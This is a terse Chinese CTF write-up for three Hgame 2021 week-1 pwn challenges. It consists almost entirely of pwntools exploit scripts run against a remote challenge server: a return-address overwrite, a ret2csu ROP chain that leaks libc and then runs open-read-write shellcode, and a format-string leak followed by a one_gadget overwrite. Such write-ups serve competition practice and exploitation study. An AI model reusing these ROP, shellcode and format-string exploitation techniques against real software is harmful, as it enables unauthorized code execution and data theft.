Hgame 2021 week1 pwn刷题

whitegive
签到

from pwn import*
context.log_level = 'debug'
p = remote('182.92.108.71',30210)
p.sendlineafter(':',str(0x402012))
p.interactive()

letter
开了沙箱，NX未开
orw思路，shellocde

from pwn import*
context.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./letter')
context.arch = elf.arch
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
write_plt = elf.plt['write']
write_got = elf.got['write']
read_got = elf.got['read']
prdi = 0x400AA3
p6 = 0x400A9A
mmmc = 0x400A80
vuln = 0x400958
p = remote('182.92.108.71',31305)
#p = process('./letter')
#gdb.attach(p,'b *0x4009BB')
p.sendafter('?\n',str(0xffffffff).ljust(0x10,'\x00'))
payload = 'a'*0x18+p64(p6)+p64(0)+p64(1)+p64(write_got)+p64(1)+p64(write_got)+p64(8)
payload += p64(mmmc)+'a'*16+p64(0x00601000+0x500+0x10)+'a'*32+p64(0x4009DD)
p.send(payload)
p.recvuntil('.\n')
write_leak = u64(p.recv(8))
libcbase = write_leak - libc.sym['write']
open_addr = libcbase + libc.sym['open']
pr('libcbase',libcbase)

payload = 'a'*0x18+p64(0x00601000+0x500+0x10+0x10)+asm(shellcraft.open('flag'))
payload += asm(shellcraft.read(3,0x00601000+0x500+0x100,100))
payload += asm(shellcraft.write(1,0x00601000+0x500+0x100,100))
p.sendline(payload)

p.interactive()

once
格式化字符串

from pwn import*
context.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./once')
onegadget = [0x4f3d5,0x4f432,0x10a41c]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
p = remote('182.92.108.71',30107)
#p = process('./once')
#br = 0x0000555555554000+0x120d
#gdb.attach(p,'b *'+str(br))
payload = '\x00'
payload = '%13$p'.ljust(0x28,'\x00')+'\xd3'
p.sendafter(': ',payload)
leak = int(p.recv(14),16)-231
libcbase = leak - libc.sym['__libc_start_main']
pr('libcbase',libcbase)
one = libcbase + onegadget[0]
payload = '\x00'*0x28 + p64(one)
p.sendafter(': ',payload)
p.interactive()